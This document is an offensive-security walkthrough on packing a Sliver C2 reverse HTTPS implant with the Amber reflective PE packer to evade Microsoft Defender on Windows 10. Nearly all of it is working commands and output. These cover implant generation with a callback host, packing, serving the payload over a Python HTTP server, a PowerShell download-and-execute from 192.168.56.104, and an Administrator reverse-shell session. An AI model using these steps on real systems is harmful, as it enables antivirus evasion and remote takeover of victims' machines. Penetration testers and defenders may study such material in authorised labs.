=========================================================================================================================================================
AV bypass using the packer 'Amber'
=========================================================================================================================================================

=> Source: https://github.com/EgeBalci/amber

Amber is a position-independent(reflective) PE loader that enables in-memory execution of native PE files(EXE, DLL, SYS...). 
It enables stealthy in-memory payload deployment that can be used to bypass anti-virus, firewall, IDS, IPS products, and application white-listing mitigations. 
Reflective payloads generated by Amber can either be staged from a remote server or executed directly in memory much like a generic shellcode. 
By default, every generated payload is encoded using the new generation SGN encoder. 
Amber uses CRC32_API and IAT_API for inconspicuously resolving the Windows API function addresses. 
After the PE file is loaded and executed in memory, the reflective payload is erased for evading memory scanners.


=========================================================================================================================================================
PoC - Example with a SLIVER reverse HTTPS shell (x64 implant) running on a Windows 10 laptop (with the MS Defender AV enabled & up-to-date)
=========================================================================================================================================================

-------------------------------------------------------------------------------------------------------------
Step 1 - Generate a SLIVER HTTPS reverse shell (x64 implant)
-------------------------------------------------------------------------------------------------------------

[server] sliver > generate --arch amd64 -f exe --http 192.168.56.104 --save /home/jeff/Documents/Tools/SLiver-C2/SliverRevShell.exe --os Windows

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 2m6s
[*] Implant saved to /home/jeff/Documents/Tools/SLiver-C2/SliverRevShell.exe

-------------------------------------------------------------------------------------------------------------
Step 2 - Use 'Amber' to generate a packed version of the SLIVER HTTPS reverse shell (x64 implant)
-------------------------------------------------------------------------------------------------------------

jeff@kali:~/Documents/Tools/amber_packer$ ./amber --file SliverRevShell.exe -e 1 --build

//       █████╗ ███╗   ███╗██████╗ ███████╗██████╗                                                                                                         
//      ██╔══██╗████╗ ████║██╔══██╗██╔════╝██╔══██╗                                                                                                        
//      ███████║██╔████╔██║██████╔╝█████╗  ██████╔╝                                                                                                        
//      ██╔══██║██║╚██╔╝██║██╔══██╗██╔══╝  ██╔══██╗                                                                                                        
//      ██║  ██║██║ ╚═╝ ██║██████╔╝███████╗██║  ██║                                                                                                        
//      ╚═╝  ╚═╝╚═╝     ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝                                                                                                        
//  Reflective PE Packer ☣ Copyright (c) 2017 EGE BALCI                                                                                                    
//      v3.0.0 - https://github.com/egebalci/amber                                                                                                         
                                                                                                        
[*] File: SliverRevShell4.exe
[*] Build Stub: true
[*] Encode Count: 1
[*] API: CRC
[*] Final Size: 18915840 bytes
[*] Build File: SliverRevShell.exe
[âœ”] Reflective PE generated !


jeff@kali:~/Documents/Tools/amber_packer$ ls -al SliverRevShell_packed.exe
-rw-r--r-- 1 jeff jeff 18915840 Jan  3 19:46 SliverRevShell_packed.exe

------------------------------------------------------------------------------------------------------------------------------------
Step 3 - Download and execute on a Windows 10 laptop the packed version of the SLIVER HTTPS reverse shell (x64 implant) without 
         being detected nor blocked by the Microsoft Defender Antivirus 
------------------------------------------------------------------------------------------------------------------------------------

jeff@kali:~/Documents/Tools/amber_packer$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
192.168.56.1 - - [03/Jan/2023 19:51:28] "GET / HTTP/1.1" 200 -
192.168.56.1 - - [03/Jan/2023 19:51:28] code 404, message File not found
192.168.56.1 - - [03/Jan/2023 19:51:28] "GET /favicon.ico HTTP/1.1" 404 -
192.168.56.1 - - [03/Jan/2023 19:51:56] "GET /SliverRevShell_packed.exe HTTP/1.1" 200 -


PS C:\Users\Administrator\Downloads> wget -URI http://192.168.56.104:8080/SliverRevShell_packed.exe -OutFile SliverRevShell_packed.exe


PS C:\Users\Administrator\Downloads> Get-MpComputerStatus | Select AntivirusEnabled,RealTimeProtectionEnabled,IoavProtectionEnabled,AntispywareEnabled,AntivirusSignatureLastUpdated | FL                                                                                         

AntivirusEnabled              : True
RealTimeProtectionEnabled     : True
IoavProtectionEnabled         : True
AntispywareEnabled            : True
AntivirusSignatureLastUpdated : 03/01/2023 11:52:46


PS C:\Users\Administrator\Downloads> .\SliverRevShell_packed.exe

------------------------------------------------------------------------------------------------------------------------------------
Step 4 - Enjoy the SLIVER reverse shell running on the target Windows 10 laptop 
------------------------------------------------------------------------------------------------------------------------------------

jeff@kali:~$ sudo sliver-server
[sudo] password for jeff: 

    ███████╗██╗     ██╗██╗   ██╗███████╗██████╗
    ██╔════╝██║     ██║██║   ██║██╔════╝██╔══██╗
    ███████╗██║     ██║██║   ██║█████╗  ██████╔╝
    ╚════██║██║     ██║╚██╗ ██╔╝██╔══╝  ██╔══██╗
    ███████║███████╗██║ ╚████╔╝ ███████╗██║  ██║
    ╚══════╝╚══════╝╚═╝  ╚═══╝  ╚══════╝╚═╝  ╚═╝

All hackers gain reinforce
[*] Server v1.5.31 - kali
[*] Welcome to the sliver shell, please type 'help' for options

[server] sliver > https --lhost 192.168.56.104 --lport 443

[*] Starting HTTPS :443 listener ...

[*] Successfully started job #1

[*] Session 4cf39cba JITTERY_JUTE - 192.168.56.1:1484 (Laptop1) - windows/amd64 - Tue, 03 Jan 2023 20:01:06 CET

[server] sliver > sessions 

 ID         Transport   Remote Address      Hostname   Username        Operating System   Health  
========== =========== =================== ========== =============== ================== =========
 4cf39cba   http(s)     192.168.56.1:1484   Laptop1   Administrator   windows/amd64      [ALIVE] 

[server] sliver > sessions -i 4cf39cba

[*] Active session JITTERY_JUTE (4cf39cba)

[server] sliver (JITTERY_JUTE) > whoami

Logon ID: PO718687\Administrator
[*] Current Token ID: Laptop1\Administrator
[server] sliver (JITTERY_JUTE) > background

[*] Background ...

[server] sliver >  

